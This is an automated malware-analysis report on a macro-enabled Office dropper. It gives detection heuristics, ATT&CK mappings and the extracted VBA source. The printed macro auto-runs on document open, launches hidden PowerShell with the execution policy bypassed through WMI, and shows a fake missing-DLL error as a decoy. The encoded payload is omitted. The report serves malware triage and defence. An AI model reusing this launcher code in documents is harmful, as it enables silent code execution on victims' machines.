MALICIOUS
Risk Score: 390
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
The sample contains a VBA macro that executes a PowerShell command. The macro uses WMI to launch PowerShell with a hidden window and bypasses execution policy. The PowerShell command itself is heavily encoded, but its presence indicates a secondary payload is likely being downloaded and executed. The document body attempts to lure the user into enabling macros by claiming the document is protected.
Heuristics 11
- ClamAV: Doc.Dropper.Donoff-5743532-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- PowerShell reference in VBA (critical, OLE_VBA_PS): PowerShell reference in VBA. Matched line in script:
  Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
  objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -e [Base64-encoded payload omitted] …
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script:
  strComputer = "."
  Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script:
  strComputer = "."
  Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script:
  Attribute VB_Customizable = True
  Sub Document_Open()
  Execute
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Suspicious extracted artifact (high, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://pngimages.net/sites/default/files/brown-locked-png-image-880.png (In document text, OLE body)
  - https://upload.wikimedia.org/wikipedia/en/thumb/8/81/MS_Office_2007_Logo.svg/1024px-MS_Office_2007_Logo.svg.png (In document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14929 bytes |

SHA-256: f796eeb71f4e73346bb47f9e3ed41da1e5cb118c3de70a43834d363a60781433
Detection: ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains a PowerShell -EncodedCommand style payload. Carved artifact contains 17 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Execute
errorb
End Sub
Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -e [Base64-encoded payload omitted]", Null, objConfig, intProcessID
End Function
Public Function errorb() As Variant
MsgBox "The program can't decrypt content because MSVCR110.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbCritical, "Protected Mode, System Error"
End Function